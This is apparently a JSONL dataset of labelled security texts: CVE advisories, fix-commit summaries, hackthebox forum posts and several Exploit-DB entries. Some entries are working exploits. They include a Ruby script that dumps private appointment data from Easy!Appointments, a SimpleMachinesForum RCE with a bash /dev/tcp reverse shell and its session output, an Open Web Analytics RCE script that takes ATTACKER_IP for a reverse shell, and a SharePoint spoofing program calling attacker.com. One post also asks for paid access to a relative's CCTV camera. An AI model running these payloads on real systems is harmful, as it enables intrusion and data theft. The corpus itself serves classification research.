+{"id": "12089abc6c0626dadbb6", "text": "Easy Appointments 1.4.2 - Information Disclosure\n\n# Exploit Title: Easy Appointments 1.4.2 - Information Disclosure\n# Exploit author: noraj (Alexandre ZANNI) for ACCEIS (https://www.acceis.fr)\n# Author website: https://pwn.by/noraj/\n# Exploit source: https://github.com/Acceis/exploit-CVE-2022-0482\n# Date: 2022-04-11\n# Vendor Homepage: https://easyappointments.org/\n# Software Link: https://github.com/alextselegidis/easyappointments/archive/refs/tags/1.4.2.tar.gz\n# Version: < 1.4.3 (it means up to 1.4.2)\n# Tested on: Easy!Appointments Version 1.3.2\n\n# Vulnerability\n## Discoverer: Francesco CARLUCCI\n## Date: 2022-01-30\n## Discoverer website: https://carluc.ci/\n## Discovered on OpenNetAdmin 1.4.2\n## Title: Exposure of Private Personal Information to an Unauthorized Actor in alextselegidis/easyappointments\n## CVE: CVE-2022-0482\n## CWE: CWE-863\n## Patch: https://github.com/alextselegidis/easyappointments/commit/bb71c9773627dace180d862f2e258a20df84f887#diff-4c48e5652fb13f13d2a50b6fb5d7027321913c4f8775bb6d1e8f79492bdd796c\n## References:\n## - https://huntr.dev/bounties/2fe771ef-b615-45ef-9b4d-625978042e26/\n## - https://github.com/alextselegidis/easyappointments/tree/1.4.2\n## - https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2022/CVE-2022-0482.yaml\n## - https://opencirt.com/hacking/securing-easy-appointments-cve-2022-0482/\n## - https://nvd.nist.gov/vuln/detail/CVE-2022-0482\n\n#!/usr/bin/env ruby\n\nrequire 'date'\nrequire 'httpx'\nrequire 'docopt'\n\ndoc = <<~DOCOPT\nEasy!Appointments < 1.4.3 - Unauthenticated PII (events) disclosure\n\n Source: https://github.com/Acceis/exploit-CVE-2022-0482\n\n Usage:\n #{__FILE__} [ ] [--debug]\n #{__FILE__} -h | --help\n\n Options:\n Root URL (base path) including HTTP scheme, port and root folder\n All events since (default: 2015-01-11)\n All events until (default: today)\n --debug Display arguments\n -h, --help Show this screen\n\n Examples:\n #{__FILE__} http://10.0.0.1\n #{__FILE__} https://10.0.0.1:4567/subdir 2022-04-01 2022-04-30\nDOCOPT\n\ndef fetch_csrf(root_url, http)\n vuln_url = \"#{root_url}/index.php\"\n\n http.get(vuln_url)\nend\n\ndef exploit(root_url, startDate, endDate, http)\n vuln_url = \"#{root_url}/index.php/backend_api/ajax_get_calendar_events\"\n\n params = {\n 'csrfToken' => http.cookies.first.value, # csrfCookie\n 'startDate' => startDate.nil? ? '2015-01-11' : startDate,\n 'endDate' => endDate.nil? ? Date.today.to_s : endDate\n }\n\n http.post(vuln_url, form: params)\nend\n\nbegin\n args = Docopt.docopt(doc)\n pp args if args['--debug']\n\n http = HTTPX.plugin(:cookies)\n fetch_csrf(args[''], http)\n puts exploit(args[''], args[''], args[''], http).body\nrescue Docopt::Exit => e\n puts e.message\nend", "source": "exploitdb", "timestamp": "2022-04-19", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "e4f953f2429dea210a75", "text": "CVE: CVE-2022-0272\n\n[{'lang': 'en', 'value': 'Improper Restriction of XML External Entity Reference in GitHub repository detekt/detekt prior to 1.20.0.'}]\n\nFix commit: Parse Baseline in a secure way (#4499)", "source": "cvefixes", "timestamp": "2022-04-21", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "d8c421e1b0caa6021e63", "text": "ChakraCore RCE Vulnerability\n\n[Severity: HIGH]\n\nChakraCore and Microsoft Edge in Windows 10 Gold, 1511, 1607, 1703, 1709, and Windows Server 2016 allows an attacker to execute arbitrary code in the context of the current user, due to how the scripting engine handles objects in memory, aka \"Scripting Engine Memory Corruption Vulnerability\". This CVE ID is unique from CVE-2017-11886, CVE-2017-11890, CVE-2017-11893, CVE-2017-11894, CVE-2017-11895, CVE-2017-11901, CVE-2017-11903, CVE-2017-11905, CVE-2017-11907, CVE-2017-11908, CVE-2017-11909, CVE-2017-11910, CVE-2017-11911, CVE-2017-11912, CVE-2017-11913, CVE-2017-11914, CVE-2017-11916, CVE-2017-11918, and CVE-2017-11930.", "source": "github_advisory", "timestamp": "2022-05-14", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "5c40b6b34430864ca454", "text": "Subrion Cross-site scripting (XSS) vulnerability\n\n[Severity: MEDIUM]\n\nCross-site scripting (XSS) vulnerability in Subrion CMS allows remote attackers to inject arbitrary web script or HTML via the body to blog/add/, a different vulnerability than CVE-2017-6069.", "source": "github_advisory", "timestamp": "2022-05-14", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "66371ddf6729f100175e", "text": "SimpleMachinesForum v2.1.1 - Authenticated Remote Code Execution\n\n# Exploit Title: SimpleMachinesForum v2.1.1 - Authenticated Remote Code Execution\n# Exploit Author: Sarang Tumne @CyberInsane (Twitter: @thecyberinsane)\n# Date: 7th March 2022\n# CVE ID: CVE-2022-26982\n# Confirmed on release 2.1.1\n# Vendor: https://download.simplemachines.org/\n# Note- Once we insert the vulnerable php code, we can even execute it without any valid login as it is not required! We can use it as a backdoor!\n\n###############################################\n#Step1- Login with Admin Credentials\n#Step2- Goto Admin=>Main=>Administration Center=>Configuration=>Themes and Layout=>Modify Themes=>Browse the templates and files in this theme.=>Admin.template.php\n#Step3- Now add the vulnerable php reverse tcp web shell exec(\"/bin/bash -c 'bash -i >& /dev/tcp/192.168.56.1/4477 0>&1'\"); ?>\n#Step4- Now Goto Add Media=>Add Resource=> Upload php web shell and click on SAVE CHANGES at the bottom of the page\n#Step5- Now click on \"Themes and Layout\" and you will get the reverse shell:\nE.g: Visit http://IP_ADDR/index.php?action=admin;area=theme;b4c2510f=bc6cde24d794569356b81afc98ede2c2 and get the reverse shell:\n\nlistening on [any] 4477 ...\nconnect to [192.168.56.1] from (UNKNOWN) [192.168.56.130] 41276\nbash: cannot set terminal process group (1334): Inappropriate ioctl for device\nbash: no job control in this shell\ndaemon@debian:/opt/bitnami/simplemachinesforum$ whoami\nwhoami\ndaemon\ndaemon@debian:/opt/bitnami/simplemachinesforum$ id\nid\nuid=1(daemon) gid=1(daemon) groups=1(daemon)\ndaemon@debian:/opt/bitnami/simplemachinesforum$", "source": "exploitdb", "timestamp": "2023-03-25", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "fe4675097ec621526d16", "text": "How to run Inline Assembly with Compiler Generated Assembly Code\n\nHi currently I am attempting to use inline assembly language with compiler generated assembly code and while I have known Assembly Language for years this is my 1st time using inline assembly. Issue: When I use a section of my compiler generated assembly code in my C++ program which I Inlined I get a syntax error stating that it doesn't recognize my definitions even though they are pulled from my C++ program. My Question: How do I fix my Assembly syntax so my Inline Assembly Code will read my Assembly data? My Assembly Code and list of errors are below Software I am using: Microsoft Visual Studio 2008 C++ Platform: Windows 10 If you need additional specs due to it being Assembly Language let me know Code: #include \"DarkGDK.h\" #include \"Profiler.h\" #include using namespace std; void DarkGDK( void )\n{ //-----This is the end of the include process------------------// //------This is the start of the program-----------------------// const int RADIUS = 50; // Variables for the circle's XY coordinates. // We initialize these with the cordinates of // the center of the screen. int x = dbScreenWidth() / 2; int y = dbScreenHeight() / 2; dbSyncOn(); // Disable auto screen refresh dbSyncRate(60); // Set the maximum screen refresh rate // The game loop while ( LoopGDK()) { //-----This is just the profiler skip------------------// PROFILER_FRAME(\"DarkGDK( void )\"); PROFILE PROFILER_CATEGORY( \"dbUpKey\", Profiler::Color::Aqua ) PROFILER_CATEGORY( \"dbDownKey\", Profiler::Color::CadetBlue ) PROFILER_CATEGORY( \"dbLeftKey\", Profiler::Color::DarkGray ) PROFILER_CATEGORY( \"dbRightKey\", Profiler::Color::Magenta ) //-----This is just the profiler end skip------------------// // Clear the screen. dbCLS(); // Draw the circle at its current location. //dbCircle(x, y, RADIUS); __asm\n{ // ; //---------------------------------------------This is the part of the Optimization Attempt-----------------------------------------------------// //; 50 :\n//; 51 : // If any arrow key is being pressed, then\n//; 52 : // move the circle acccordingly.\n//; 53 :\n//; 54 : //---What I am attempting to optimize\n//; 55 :\n//; 56 : if ( dbUpKey() ) call ?dbUpKey@@YAHXZ //; dbUpKey test eax, eax je SHORT $LN4@DarkGDK //; 57 : {\n//; 58 : y--; mov eax, DWORD PTR _y$[ebp] sub eax, 1 mov DWORD PTR _y$[ebp], eax\n$LN4@DarkGDK: //; 59 : }\n//; 60 :\n//; 61 : if ( dbDownKey() ) call ?dbDownKey@@YAHXZ //; dbDownKey test eax, eax je SHORT $LN3@DarkGDK //; 62 : {\n//; 63 : y++; mov eax, DWORD PTR _y$[ebp] add eax, 1 mov DWORD PTR _y$[ebp], eax\n$LN3@DarkGDK: //; 64 : }\n//; 65 :\n//; 66 : if ( dbLeftKey() ) call ?dbLeftKey@@YAHXZ //; dbLeftKey test eax, eax je SHORT $LN2@DarkGDK //; 67 : {\n//; 68 : x--; mov eax, DWORD PTR _x$[ebp] sub eax, 1 mov DWORD PTR _x$[ebp], eax\n$LN2@DarkGDK: //; 69 : }\n//; 70 :\n//; 71 : if (dbRightKey() ) call ?dbRightKey@@YAHXZ //; dbRightKey test eax, eax je SHORT $LN1@DarkGDK //; 72 : {\n//; 73 : x++; mov eax, DWORD PTR _x$[ebp] add eax, 1 mov DWORD PTR _x$[ebp], eax\n$LN1@DarkGDK: //; 74 : }\n//; 75 : //---What I am attempting to optimize\n//; 76 : //; //---------------------------------------------This is the part of the Optimization Attempt End-----------------------------------------------------// } // If any arrow key is being pressed, then // move the circle acccordingly. //---What I am attempting to optimize /*if ( dbUpKey() ) { y--; } if ( dbDownKey() ) { y++; } if ( dbLeftKey() ) { x--; } if (dbRightKey() ) { x++; } //---What I am attempting to optimize\n*/ // Update the screen. dbSync(); //WinExec(\"C:\\Users\\DeVaughn\\Documents\\MasmAssemblyLanguagefileexamples\\run.bat\",SW_SHOWNORMAL); } //---Where the program has ended----// } Below are my list of errors Code: Error 3 error C2018: unknown character '0x40' line 73\nError 4 error C2018: unknown character '0x40' line 73\nError 7 error C2018: unknown character '0x40' line 75\nError 9 error C2018: unknown character '0x40' line 83\nError 13 error C2018: unknown character '0x40' line 89\nError 14 error C2018: unknown character '0x40' line 89\nError 17 e", "source": "go4expert", "timestamp": "2022-06-22", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "60abab30b70062e93ef9", "text": "CVE: CVE-2022-1034\n\n[{'lang': 'en', 'value': 'There is a Unrestricted Upload of File vulnerability in ShowDoc v2.10.3 in GitHub repository star7th/showdoc prior to 2.10.4.'}]\n\nFix commit: Security update / 安全性更新", "source": "cvefixes", "timestamp": "2022-03-22", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "95034c8cebf365b2e2ec", "text": "Just a note to all… ensure you run the code on the pwnbox. i was running it on my redhat server and getting the errors. same code on the pwnbox, worked ! thanks to PayloadBunny for the advice.", "source": "hackthebox", "timestamp": "2022-04-14", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "0a59f1138483b197b753", "text": "Hello everyone, I am having the same problem as others before me: I am using the same script as posted before I create a token for htbuser and convert the given timestamp to epoch I also tried to take the timestamp and convert it to my time zone, then convert it to epoch Fed the timestamp to the script with a ±1000 ms range The script iterates 2000 times and each time creates an md5 hash of htbadmin+iteration# It sends the request and filters out all responses with the string “Wrong token” but… It does just that for 2000 times without returning any valid token. Nothing at all happens. So I am guessing that my mistake is at the beginning when I choose the timestamp to convert? I am using online websites or date -d ‘TIMESTAMP’ +%s for the conversion. Can someone point me in the right direction?", "source": "hackthebox", "timestamp": "2022-05-27", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "483d57b60e60b6f83ce8", "text": "Open Web Analytics 1.7.3 - Remote Code Execution\n\n# Exploit Title: Open Web Analytics 1.7.3 - Remote Code Execution (RCE)\n# Date: 2022-08-30\n# Exploit Author: Jacob Ebben\n# Vendor Homepage: https://www.openwebanalytics.com/\n# Software Link: https://github.com/Open-Web-Analytics\n# Version: <1.7.4\n# Tested on: Linux\n# CVE : CVE-2022-24637\n\nimport argparse\nimport requests\nimport base64\nimport re\nimport random\nimport string\nimport hashlib\nfrom termcolor import colored\n\ndef print_message(message, type):\n if type == 'SUCCESS':\n print('[' + colored('SUCCESS', 'green') + '] ' + message)\n elif type == 'INFO':\n print('[' + colored('INFO', 'blue') + '] ' + message)\n elif type == 'WARNING':\n print('[' + colored('WARNING', 'yellow') + '] ' + message)\n elif type == 'ALERT':\n print('[' + colored('ALERT', 'yellow') + '] ' + message)\n elif type == 'ERROR':\n print('[' + colored('ERROR', 'red') + '] ' + message)\n\ndef get_normalized_url(url):\n if url[-1] != '/':\n url += '/'\n if url[0:7].lower() != 'http://' and url[0:8].lower() != 'https://':\n url = \"http://\" + url\n return url\n\ndef get_proxy_protocol(url):\n if url[0:8].lower() == 'https://':\n return 'https'\n return 'http'\n\ndef get_random_string(length):\n chars = string.ascii_letters + string.digits\n return ''.join(random.choice(chars) for i in range(length))\n\ndef get_cache_content(cache_raw):\n regex_cache_base64 = r'\\*(\\w*)\\*'\n regex_result = re.search(regex_cache_base64, cache_raw)\n if not regex_result:\n print_message('The provided URL does not appear to be vulnerable ...', \"ERROR\")\n exit()\n else:\n cache_base64 = regex_result.group(1)\n return base64.b64decode(cache_base64).decode(\"ascii\")\n\ndef get_cache_username(cache):\n regex_cache_username = r'\"user_id\";O:12:\"owa_dbColumn\":11:{s:4:\"name\";N;s:5:\"value\";s:5:\"(\\w*)\"'\n return re.search(regex_cache_username, cache).group(1)\n\ndef get_cache_temppass(cache):\n regex_cache_temppass = r'\"temp_passkey\";O:12:\"owa_dbColumn\":11:{s:4:\"name\";N;s:5:\"value\";s:32:\"(\\w*)\"'\n return re.search(regex_cache_temppass, cache).group(1)\n\ndef get_update_nonce(url):\n try:\n update_nonce_request = session.get(url, proxies=proxies)\n regex_update_nonce = r'owa_nonce\" value=\"(\\w*)\"'\n update_nonce = re.search(regex_update_nonce, update_nonce_request.text).group(1)\n except Exception as e:\n print_message('An error occurred when attempting to update config!', \"ERROR\")\n print(e)\n exit()\n else:\n return update_nonce\n\nparser = argparse.ArgumentParser(description='Exploit for CVE-2022-24637: Unauthenticated RCE in Open Web Analytics (OWA)')\nparser.add_argument('TARGET', type=str,\n help='Target URL (Example: http://localhost/owa/ or https://victim.xyz:8000/)')\nparser.add_argument('ATTACKER_IP', type=str,\n help='Address for reverse shell listener on attacking machine')\nparser.add_argument('ATTACKER_PORT', type=str,\n help='Port for reverse shell listener on attacking machine')\nparser.add_argument('-u', '--username', default=\"admin\", type=str,\n help='The username to exploit (Default: admin)')\nparser.add_argument('-p','--password', default=get_random_string(32), type=str,\n help='The new password for the exploited user')\nparser.add_argument('-P','--proxy', type=str,\n help='HTTP proxy address (Example: http://127.0.0.1:8080/)')\nparser.add_argument('-c', '--check', action='store_true',\n help='Check vulnerability without exploitation')\n\nargs = parser.parse_args()\n\nbase_url = get_normalized_url(args.TARGET)\nlogin_url = base_url + \"index.php?owa_do=base.loginForm\"\npassword_reset_url = base_url + \"index.php?owa_do=base.usersPasswordEntry\"\nupdate_config_url = base_url + \"index.php?owa_do=base.optionsGeneral\"\n\nusername = args.username\nnew_password = args.password\n\nreverse_shell = '$sock, 1=>$sock, 2=>$sock),$pipes);?>'\nshell_filename ", "source": "exploitdb", "timestamp": "2022-11-11", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "bd88fa67196eff5bdf02", "text": "CVE: CVE-2021-32436\n\n[{'lang': 'en', 'value': 'An out-of-bounds read in the function write_title() in subs.c of abcm2ps v8.14.11 allows remote attackers to cause a Denial of Service (DoS) via unspecified vectors.'}]\n\nFix commit: fix: array overflow when wrong duration in voice overlay\n\nIssue #83,", "source": "cvefixes", "timestamp": "2022-03-10", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "51b0d1c8a11cb923f345", "text": "CVE: CVE-2022-24880\n\n[{'lang': 'en', 'value': 'flask-session-captcha is a package which allows users to extend Flask by adding an image based captcha stored in a server side session. In versions prior to 1.2.1, he `captcha.validate()` function would return `None` if passed no value (e.g. by submitting an having an empty form). If implementing users were checking the return value to be **False**, the captcha verification check could be bypassed. Version 1.2.1 fixes the issue. Users can workaround the issue by not explicitly checking that the value is False. Checking the return value less explicitly should still work.'}]\n\nFix commit: add some extra tests to ensure False is returned", "source": "cvefixes", "timestamp": "2022-04-25", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "d89c90547b67d26d1d97", "text": "Improper Input Validation in Apache Struts\n\n[Severity: HIGH]\n\nActionServlet.java in Apache Struts 1 1.x through 1.3.10 mishandles multithreaded access to an ActionForm instance, which allows remote attackers to execute arbitrary code or cause a denial of service (unexpected memory access) via a multipart request, a related issue to CVE-2015-0899.", "source": "github_advisory", "timestamp": "2022-05-13", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "dffe45ee74048535e04a", "text": "Microsoft SharePoint Enterprise Server 2016 - Spoofing\n\n// Exploit Title: Microsoft SharePoint Enterprise Server 2016 - Spoofing\n// Date: 2023-06-20\n// country: Iran\n// Exploit Author: Amirhossein Bahramizadeh\n// Category : Remote\n// Vendor Homepage:\n// Microsoft SharePoint Foundation 2013 Service Pack 1\n// Microsoft SharePoint Server Subscription Edition\n// Microsoft SharePoint Enterprise Server 2013 Service Pack 1\n// Microsoft SharePoint Server 2019\n// Microsoft SharePoint Enterprise Server 2016\n// Tested on: Windows/Linux\n// CVE : CVE-2023-28288\n\n#include \n#include \n\n\n// The vulnerable SharePoint server URL\nconst char *server_url = \"http://example.com/\";\n\n// The URL of the fake SharePoint server\nconst char *fake_url = \"http://attacker.com/\";\n\n// The vulnerable SharePoint server file name\nconst char *file_name = \"vuln_file.aspx\";\n\n// The fake SharePoint server file name\nconst char *fake_file_name = \"fake_file.aspx\";\n\nint main()\n{\n HANDLE file;\n DWORD bytes_written;\n char file_contents[1024];\n\n // Create the fake file contents\n sprintf(file_contents, \"This is a fake file.
\");\n\n // Write the fake file to disk\n file = CreateFile(fake_file_name, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);\n if (file == INVALID_HANDLE_VALUE)\n {\n printf(\"Error creating fake file: %d\\n\", GetLastError());\n return 1;\n }\n if (!WriteFile(file, file_contents, strlen(file_contents), &bytes_written, NULL))\n {\n printf(\"Error writing fake file: %d\\n\", GetLastError());\n CloseHandle(file);\n return 1;\n }\n CloseHandle(file);\n\n // Send a request to the vulnerable SharePoint server to download the file\n sprintf(file_contents, \"%s%s\", server_url, file_name);\n file = CreateFile(file_name, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);\n if (file == INVALID_HANDLE_VALUE)\n {\n printf(\"Error creating vulnerable file: %d\\n\", GetLastError());\n return 1;\n }\n if (!InternetReadFileUrl(file_contents, file))\n {\n printf(\"Error downloading vulnerable file: %d\\n\", GetLastError());\n CloseHandle(file);\n return 1;\n }\n CloseHandle(file);\n\n // Replace the vulnerable file with the fake file\n if (!DeleteFile(file_name))\n {\n printf(\"Error deleting vulnerable file: %d\\n\", GetLastError());\n return 1;\n }\n if (!MoveFile(fake_file_name, file_name))\n {\n printf(\"Error replacing vulnerable file: %d\\n\", GetLastError());\n return 1;\n }\n\n // Send a request to the vulnerable SharePoint server to trigger the vulnerability\n sprintf(file_contents, \"%s%s\", server_url, file_name);\n if (!InternetReadFileUrl(file_contents, NULL))\n {\n printf(\"Error triggering vulnerability: %d\\n\", GetLastError());\n return 1;\n }\n\n // Print a message indicating that the vulnerability has been exploited\n printf(\"Vulnerability exploited successfully.\\n\");\n\n return 0;\n}\n\nBOOL InternetReadFileUrl(const char *url, HANDLE file)\n{\n HINTERNET internet, connection, request;\n DWORD bytes_read;\n char buffer[1024];\n\n // Open an Internet connection\n internet = InternetOpen(\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\", INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0);\n if (internet == NULL)\n {\n return FALSE;\n }\n\n // Connect to the server\n connection = InternetConnect(internet, fake_url, INTERNET_DEFAULT_HTTP_PORT, NULL, NULL, INTERNET_SERVICE_HTTP, 0, 0);\n if (connection == NULL)\n {\n InternetCloseHandle(internet);\n return FALSE;\n }\n\n // Send the HTTP request\n request = HttpOpenRequest(connection, \"GET\", url, NULL, NULL, NULL, 0, 0);\n if (request == NULL)\n {\n InternetCloseHandle(connection);\n InternetCloseHandle(internet);\n return FALSE;\n }\n if (!HttpSendRequest(request, NULL, 0, NULL, 0))\n {\n InternetCloseHandle(request);\n InternetCloseHandle(connection);\n InternetCloseHandle(internet)", "source": "exploitdb", "timestamp": "2023-06-26", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "6d40704059d46d71548d", "text": "BoxBuster: Harry is 1337 for anyone struggling please use this guide. Additionally, be sure to use the password policy from previous exercise in the module. I agree the question was poorly formulated. Took me more time to figure what the question was referring to that to answer. I guess that’s the point on a question right lol . Understanding even what the heck it means lol", "source": "hackthebox", "timestamp": "2022-06-24", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "c7f56f8f40ac8ee5f6a1", "text": "CVE: CVE-2022-0085\n\n[{'lang': 'en', 'value': 'Server-Side Request Forgery (SSRF) in GitHub repository dompdf/dompdf prior to 2.0.0.'}]\n\nFix commit: Add a default context\n\n- creates a user agent\n- disables following redirects", "source": "cvefixes", "timestamp": "2022-06-28", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "0ff840cfb4aca53e60c5", "text": "ClassLoader manipulation in Apache Struts\n\n[Severity: HIGH]\n\nParametersInterceptor in Apache Struts before 2.3.20 does not properly restrict access to the getClass method, which allows remote attackers to \"manipulate\" the ClassLoader and execute arbitrary code via a crafted request. NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-0094.", "source": "github_advisory", "timestamp": "2022-05-14", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "d474f2648075145034c9", "text": "Microsoft Exchange Server Remote Code Execution Vulnerability\n\nAffected: Microsoft Exchange Server\n\nMicrosoft Exchange Server contains an unspecified vulnerability that allows for authenticated remote code execution. Dubbed \"ProxyNotShell,\" this vulnerability is chainable with CVE-2022-41040 which allows for the remote code execution.\n\nRequired Action: Apply updates per vendor instructions.\n\nRansomware: Known\n\nCWE(s): CWE-502\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "source": "cisa_kev", "timestamp": "2022-09-30", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "d8802f22010a7ced34c4", "text": "BurpSuite Update\n\nFirst post in here! I’m on the latest version of Parrot. I’ve installed Burp 3.8 and since deleted it after releasing it was already installed (only 2.4). Trying to find where the dir for this is located so that I can update the version that’s already installed with Parrot. (This is an OCD thing, as Burp worked fine when I’d installed it) Thanks!", "source": "parrotsec", "timestamp": "2022-05-28", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "d65841ced5d919dfa598", "text": "CVE: CVE-2022-23586\n\n[{'lang': 'en', 'value': 'Tensorflow is an Open Source Machine Learning Framework. A malicious user can cause a denial of service by altering a `SavedModel` such that assertions in `function.cc` would be falsified and crash the Python interpreter. The fix will be included in TensorFlow 2.8.0. We will also cherrypick this commit on TensorFlow 2.7.1, TensorFlow 2.6.3, and TensorFlow 2.5.3, as these are also affected and still in supported range.'}]\n\nFix commit: Eliminate debug `CHECK`-fail from `function.cc`\n\nPiperOrigin-RevId: 409416119\nChange-Id: I8376ee464d434e9b970ff0ad49edfdaa2a273cfe", "source": "cvefixes", "timestamp": "2022-02-04", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "978e8451438b6ca4a4f2", "text": "DoS vulnerabilities persist in ESAPI file uploads despite remediation of CVE-2023-24998\n\n[Severity: HIGH]\n\n### Impact\nESAPI 2.5.2.0 and later addressed the DoS vulnerability described in CVE-2023-24998, which Apache Commons FileUpload 1.5 attempted to remediate. But while writing up a new security bulletin regarding the impact on the affected ESAPI `HTTPUtilities.getFileUploads` methods (or more specifically those methods in the `DefaultHTTPUtilities` implementation class), I realized that a DoS vulnerability still persists in ESAPI and for that matter in Apache Commons FileUpload as well.\n\n### Related to\nCVE-2023-24998\n\n### Patches\nESAPI 2.5.2.0 or later.\n\n### Workarounds\n- See the 'Solutions' section of Security Bulletin 11, in the References section. If you are not using ESAPI file uploads, see also the 'Workarounds' section.\n- Deploy an external WAF or other suitable DoS protection.\n- Add additional defenses to your code using HTTPUtilities.getFileUpload, such as requiring prior authentication, restricting how many / much content can be uploaded per user per day or per hour, etc. (It is the opinion of the ESAPI development team that such required controls should not be added to ESAPI because it is a general purpose security library and thus ESAPI ought not be enforcing generic policies like these on everyone, especially it it could break existing code bases.)\n\n### References\n[Security Bulletin 11: How Does CVE-2023-24998 Impact ESAPI?](https://github.com/ESAPI/esapi-java-legacy/blob/develop/documentation/ESAPI-security-bulletin11.pdf)\nNew ESAPI 2.5.2.0 or later Javadoc on HTTPUtilities.getFileUploads: https://javadoc.io/static/org.owasp.esapi/esapi/2.5.2.0/org/owasp/esapi/HTTPUtilities.html#getFileUploads-javax.servlet.http.HttpServletRequest-java.io.File-java.util.List-\n(Note: This link won't work until the 2.5.2.0 release is made official.)\n\n### Final Word\n(Especially to GitHub Advance Security team / GitHub as a CNA) -- I do not really wish to file a CVE for this. I had originally considered it, but there is no real way to address the general DoS scenarios for file uploads without breaking ESAPI client code which we are not willing to do. The clients have to take some responsibility for this themselves. In the next ESAPI release, I am going to add a reference to the appropriate Javadoc to this GitHub Security Advisory, but that's the best we can do. If you wish to discuss this with me, please first contact me via email at kevin.w.wall@gmail.com. ", "source": "github_advisory", "timestamp": "2023-10-27", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "fc715c901989eab06ea6", "text": "I still do not understand how it works, could you explain it more? I have no idea what I should add what in my modified code. Thanks a lot", "source": "hackthebox", "timestamp": "2023-06-29", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "efb2d42f62834ec713da", "text": "Hello. May i ask? I have completed ‘ Digging in… ’ and ‘ Bypassing Authentication ’. But I missed it ‘ Going Deeper ’. In which direction should I do to find ‘ Going Deeper ’? More dig -ging?", "source": "hackthebox", "timestamp": "2022-08-01", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "28bcb610a3a45e154abf", "text": "I got stuck too in this lesson but at the end I figured even \"apt list --installed | wc -l \" works too! but it adds one to the actual output. cuz wc counts the lines and the first line of the output of “apt list --installed” is Listing…done.", "source": "hackthebox", "timestamp": "2022-01-23", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "b309c010be9ece3f9dd6", "text": "Puppet Denial of Service and Arbitrary File Write\n\n[Severity: LOW]\n\nA vulnerability in Puppet 2.6.x before 2.6.15 and 2.7.x before 2.7.13, and Puppet Enterprise (PE) Users 1.0, 1.1, 1.2.x, 2.0.x, and 2.5.x before 2.5.1 allows remote authenticated users with agent SSL keys to **(1)** cause a denial of service (memory consumption) via a REST request to a stream that triggers a thread block, as demonstrated using CVE-2012-1986 and `/dev/random`; or **(2)** cause a denial of service (filesystem consumption) via crafted REST requests that use \"a marshaled form of a `Puppet::FileBucket::File object`\" to write to arbitrary file locations.", "source": "github_advisory", "timestamp": "2022-05-14", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "7f78c4760ee79b581a89", "text": "This command worked for me for both logs and bak files: find / -type f -name *.bak -exec ls -al {} ; 2>/dev/null |wc -l", "source": "hackthebox", "timestamp": "2022-08-22", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "b3fda5dabbed48395ba9", "text": "I am Looking for someone who can access CCTV camera of my bro house. I have IP address and Camera Info\n\nCan someone perform this task? It is a paid task and my budget is $100 and near about. If can someone do it please reply me. It is very serious problem with my family, My Elder brother is on the stage of Divorce and our family want to help him with the situation. Thanks", "source": "hackersploit", "timestamp": "2022-05-21", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "07089b96039c289acded", "text": "ChakraCore RCE Vulnerability\n\n[Severity: HIGH]\n\nA remote code execution vulnerability exists in the way that the ChakraCore scripting engine handles objects in memory, aka 'Scripting Engine Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2020-0673, CVE-2020-0674, CVE-2020-0710, CVE-2020-0712, CVE-2020-0713, CVE-2020-0767.", "source": "github_advisory", "timestamp": "2022-05-24", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "8fd4cb82410fd69b0b28", "text": "Potential leak of authentication data to 3rd parties\n\n[Severity: CRITICAL]\n\n### Impact\nUsers of typed-rest-client library version 1.7.3 or lower are vulnerable to leak authentication data to 3rd parties. \n\nThe flow of the vulnerability is as follows:\n\n1. Send any request with `BasicCredentialHandler`, `BearerCredentialHandler` or `PersonalAccessTokenCredentialHandler` \n2. The target host may return a redirection (3xx), with a link to a second host.\n3. The next request will use the credentials to authenticate with the second host, by setting the `Authorization` header.\n\nThe expected behavior is that the next request will *NOT* set the `Authorization` header.\n\n\n### Patches\nThe problem was fixed on April 1st 2020.\n\n\n### Workarounds\nThere is no workaround.\n\n### References\nThis is similar to the following issues in nature:\n1. [HTTP authentication leak in redirects](https://curl.haxx.se/docs/CVE-2018-1000007.html) - I used the same solution as CURL did.\n2. [CVE-2018-1000007](https://nvd.nist.gov/vuln/detail/CVE-2018-1000007).", "source": "github_advisory", "timestamp": "2023-04-27", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
